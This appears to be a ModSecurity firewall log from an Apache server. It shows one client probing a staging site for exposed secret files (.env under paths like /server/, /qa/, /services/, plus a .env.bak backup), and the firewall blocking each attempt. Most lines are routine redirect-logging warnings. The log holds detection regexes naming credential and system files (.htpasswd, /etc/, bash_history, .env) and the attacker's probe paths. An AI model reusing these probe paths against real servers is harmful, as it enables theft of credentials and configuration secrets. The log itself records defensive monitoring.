[Tue May 26 15:31:07.835169 2026] [security2:error] [pid 715645:tid 715895] [client 195.178.110.199:56004] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/public_html/.env"] [unique_id "ahVvY3VGgMGh8k213RgWAgAAAHg"]
[Tue May 26 15:31:07.848946 2026] [security2:error] [pid 715645:tid 715796] [client 195.178.110.199:56044] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/qa/.env"] [unique_id "ahVvY3VGgMGh8k213RgWBQAAABU"]
[Tue May 26 15:31:07.853402 2026] [security2:error] [pid 715645:tid 715893] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvY3VGgMGh8k213RgV_gAAAHY"]
[Tue May 26 15:31:07.866437 2026] [security2:error] [pid 715645:tid 715862] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvY3VGgMGh8k213RgWAQAAAFc"]
[Tue May 26 15:31:07.866681 2026] [security2:error] [pid 715645:tid 715803] [client 195.178.110.199:56060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/public/.env"] [unique_id "ahVvY3VGgMGh8k213RgWCwAAABw"]
[Tue May 26 15:31:07.895325 2026] [security2:error] [pid 715645:tid 715801] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvY3VGgMGh8k213RgWCQAAABo"]
[Tue May 26 15:31:07.911694 2026] [security2:error] [pid 715645:tid 715798] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvY3VGgMGh8k213RgWCAAAABc"]
[Tue May 26 15:31:07.920707 2026] [security2:error] [pid 715645:tid 715869] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvY3VGgMGh8k213RgWDQAAAF4"]
[Tue May 26 15:31:07.948307 2026] [security2:error] [pid 715645:tid 715879] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvY3VGgMGh8k213RgWEQAAAGg"]
[Tue May 26 15:31:07.954104 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvY3VGgMGh8k213RgWEwAAAAM"]
[Tue May 26 15:31:07.978363 2026] [security2:error] [pid 715645:tid 715829] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvY3VGgMGh8k213RgWFgAAADY"]
[Tue May 26 15:31:08.023738 2026] [security2:error] [pid 715645:tid 715781] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvY3VGgMGh8k213RgWGQAAAAY"]
[Tue May 26 15:31:08.043976 2026] [security2:error] [pid 715645:tid 715897] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvY3VGgMGh8k213RgWHAAAAHo"]
[Tue May 26 15:31:08.069874 2026] [security2:error] [pid 715645:tid 715875] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWIgAAAGQ"]
[Tue May 26 15:31:08.072578 2026] [security2:error] [pid 715645:tid 715872] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvY3VGgMGh8k213RgV7AAAAGE"]
[Tue May 26 15:31:08.088519 2026] [security2:error] [pid 715645:tid 715834] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWKgAAADs"]
[Tue May 26 15:31:08.090539 2026] [security2:error] [pid 715645:tid 715884] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWKQAAAG0"]
[Tue May 26 15:31:08.162595 2026] [security2:error] [pid 715645:tid 715848] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWLwAAAEk"]
[Tue May 26 15:31:08.172685 2026] [security2:error] [pid 715645:tid 715844] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWMgAAAEU"]
[Tue May 26 15:31:08.194157 2026] [security2:error] [pid 715645:tid 715790] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWOAAAAA8"]
[Tue May 26 15:31:08.194199 2026] [security2:error] [pid 715645:tid 715891] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWNwAAAHQ"]
[Tue May 26 15:31:08.223651 2026] [security2:error] [pid 715645:tid 715821] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWPAAAAC4"]
[Tue May 26 15:31:08.247801 2026] [security2:error] [pid 715645:tid 715780] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWPwAAAAU"]
[Tue May 26 15:31:08.265826 2026] [security2:error] [pid 715645:tid 715895] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWQgAAAHg"]
[Tue May 26 15:31:08.274375 2026] [security2:error] [pid 715645:tid 715849] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWRQAAAEo"]
[Tue May 26 15:31:08.289426 2026] [security2:error] [pid 715645:tid 715862] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWSwAAAFc"]
[Tue May 26 15:31:08.290707 2026] [security2:error] [pid 715645:tid 715803] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWTQAAABw"]
[Tue May 26 15:31:08.304474 2026] [security2:error] [pid 715645:tid 715801] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWTgAAABo"]
[Tue May 26 15:31:08.318837 2026] [security2:error] [pid 715645:tid 715885] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWVAAAAG4"]
[Tue May 26 15:31:08.320349 2026] [security2:error] [pid 715645:tid 715798] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWUQAAABc"]
[Tue May 26 15:31:08.325772 2026] [security2:error] [pid 715645:tid 715836] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWVwAAAD0"]
[Tue May 26 15:31:08.344035 2026] [security2:error] [pid 715645:tid 715824] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWWgAAADE"]
[Tue May 26 15:31:08.371956 2026] [security2:error] [pid 715645:tid 715797] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWXQAAABY"]
[Tue May 26 15:31:08.385594 2026] [security2:error] [pid 715645:tid 715889] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWZAAAAHI"]
[Tue May 26 15:31:08.453131 2026] [security2:error] [pid 715645:tid 715856] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWcAAAAFE"]
[Tue May 26 15:31:08.540226 2026] [security2:error] [pid 715645:tid 715790] [client 195.178.110.199:56014] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/s3/.env.bak"] [unique_id "ahVvZHVGgMGh8k213RgWeQAAAA8"]
[Tue May 26 15:31:08.599432 2026] [security2:error] [pid 715645:tid 715815] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWfQAAACg"]
[Tue May 26 15:31:08.599646 2026] [security2:error] [pid 715645:tid 715811] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWfAAAACQ"]
[Tue May 26 15:31:08.604954 2026] [security2:error] [pid 715645:tid 715863] [client 195.178.110.199:41810] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/server/api/.env"] [unique_id "ahVvZHVGgMGh8k213RgWjgAAAFg"]
[Tue May 26 15:31:08.619025 2026] [security2:error] [pid 715645:tid 715822] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWgwAAAC8"]
[Tue May 26 15:31:08.634390 2026] [security2:error] [pid 715645:tid 715845] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWiQAAAEY"]
[Tue May 26 15:31:08.643543 2026] [security2:error] [pid 715645:tid 715820] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWjQAAAC0"]
[Tue May 26 15:31:08.644661 2026] [security2:error] [pid 715645:tid 715805] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWigAAAB4"]
[Tue May 26 15:31:08.647378 2026] [security2:error] [pid 715645:tid 715835] [client 195.178.110.199:56044] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/server/backend/.env"] [unique_id "ahVvZHVGgMGh8k213RgWkwAAADw"]
[Tue May 26 15:31:08.657632 2026] [security2:error] [pid 715645:tid 715775] [client 195.178.110.199:41680] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWiAAAAAA"]
[Tue May 26 15:31:08.665084 2026] [security2:error] [pid 715645:tid 715813] [client 195.178.110.199:55952] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWkQAAACY"]
[Tue May 26 15:31:08.671396 2026] [security2:error] [pid 715645:tid 715876] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWkgAAAGU"]
[Tue May 26 15:31:08.717089 2026] [security2:error] [pid 715645:tid 715858] [client 195.178.110.199:55968] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/server/.env"] [unique_id "ahVvZHVGgMGh8k213RgWmgAAAFM"]
[Tue May 26 15:31:08.748003 2026] [security2:error] [pid 715645:tid 715902] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWmQAAAH8"]
[Tue May 26 15:31:08.749706 2026] [security2:error] [pid 715645:tid 715784] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWmAAAAAk"]
[Tue May 26 15:31:08.795360 2026] [security2:error] [pid 715645:tid 715870] [client 195.178.110.199:41818] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWngAAAF8"]
[Tue May 26 15:31:08.796646 2026] [security2:error] [pid 715645:tid 715853] [client 195.178.110.199:41810] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWnwAAAE4"]
[Tue May 26 15:31:08.837388 2026] [security2:error] [pid 715645:tid 715793] [client 195.178.110.199:56060] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWoAAAABI"]
[Tue May 26 15:31:08.864808 2026] [security2:error] [pid 715645:tid 715786] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWowAAAAs"]
[Tue May 26 15:31:08.951101 2026] [security2:error] [pid 715645:tid 715889] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWpgAAAHI"]
[Tue May 26 15:31:08.960316 2026] [security2:error] [pid 715645:tid 715886] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWqQAAAG8"]
[Tue May 26 15:31:08.969511 2026] [security2:error] [pid 715645:tid 715809] [client 195.178.110.199:41804] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWqgAAACI"]
[Tue May 26 15:31:08.984781 2026] [security2:error] [pid 715645:tid 715868] [client 195.178.110.199:41726] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWqwAAAF0"]
[Tue May 26 15:31:09.031704 2026] [security2:error] [pid 715645:tid 715895] [client 195.178.110.199:56004] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/services/.env"] [unique_id "ahVvZXVGgMGh8k213RgWuAAAAHg"]
[Tue May 26 15:31:09.039938 2026] [security2:error] [pid 715645:tid 715838] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZHVGgMGh8k213RgWrgAAAD8"]
[Tue May 26 15:31:09.065327 2026] [security2:error] [pid 715645:tid 715821] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgWtAAAAC4"]
[Tue May 26 15:31:09.099250 2026] [security2:error] [pid 715645:tid 715816] [client 195.178.110.199:56088] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgWvAAAACk"]
[Tue May 26 15:31:09.106675 2026] [security2:error] [pid 715645:tid 715796] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgWvwAAABU"]
[Tue May 26 15:31:09.113639 2026] [security2:error] [pid 715645:tid 715890] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgWwwAAAHM"]
[Tue May 26 15:31:09.132476 2026] [security2:error] [pid 715645:tid 715877] [client 195.178.110.199:56030] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/service/.env"] [unique_id "ahVvZXVGgMGh8k213RgWyQAAAGY"]
